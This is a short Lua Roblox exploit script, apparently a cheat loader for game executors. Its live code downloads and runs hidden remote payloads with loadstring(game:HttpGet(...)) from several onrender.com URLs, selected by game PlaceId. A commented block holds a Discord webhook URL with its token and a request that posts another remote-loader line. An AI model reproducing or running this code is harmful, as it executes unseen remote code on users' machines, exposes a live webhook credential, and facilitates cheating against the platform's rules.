--[[

    local HttpService = game:GetService("HttpService"); local Request = http_request or request or (syn and syn.request); local WEBHOOK = "https://discord.com/api/webhooks/1456921374881878193/ZWiYLNX8CL01osj5qgUBcFO8NYcKqXxIvST9XKP3eClOxNtUmkH_9H5eG7TE6nFS2784"; if Request then Request({Url = WEBHOOK, Method = "POST", Headers = {["Content-Type"]="application/json"}, Body = HttpService:JSONEncode({content = "```loadstring(game:HttpGet(\"https://pastefy.app/tGuaCYCe/raw\"))()```"})}) end

    ]]



if not _G._30920929389UHIJSSIJSIXIKQJDBWOJ877188172 then
    _G._30920929389UHIJSSIJSIXIKQJDBWOJ877188172 = true

    
        loadstring(game:HttpGet("https://protected-roblox-scripts.onrender.com/41f9cc54277cae1b2a6a3250699365ea"))()
    if game.PlaceId == 6735572261 then
        loadstring(game:HttpGet("https://protected-roblox-scripts.onrender.com/19aeb4482c2cff891b1953d4a4900b2e"))()
    end

    for _, id in pairs({2753915549, 4442272183, 7449423635}) do
        if game.PlaceId == id then
            loadstring(game:HttpGet("https://protected-roblox-scripts.onrender.com/634b34ee45b417a72d48abbd7e415198"))()
            break
        end
    end
end
